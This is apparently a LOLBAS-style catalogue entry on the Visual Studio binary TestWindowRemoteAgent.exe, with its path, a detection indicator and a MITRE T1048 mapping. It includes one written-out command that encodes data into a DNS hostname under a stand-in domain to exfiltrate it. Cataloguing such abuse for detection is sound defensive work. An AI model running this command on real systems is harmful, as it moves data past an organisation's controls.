.. /TestWindowRemoteAgent.exe
TestWindowRemoteAgent.exe is the command-line tool to establish RPC
Paths:
- C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
Detection:
- IOC: TestWindowRemoteAgent.exe spawning unexpectedly
Upload
Sends DNS query for open connection to any host, enabling exfiltration over DNS
TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
Usecase: Attackers may utilize this to exfiltrate data over DNS
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1048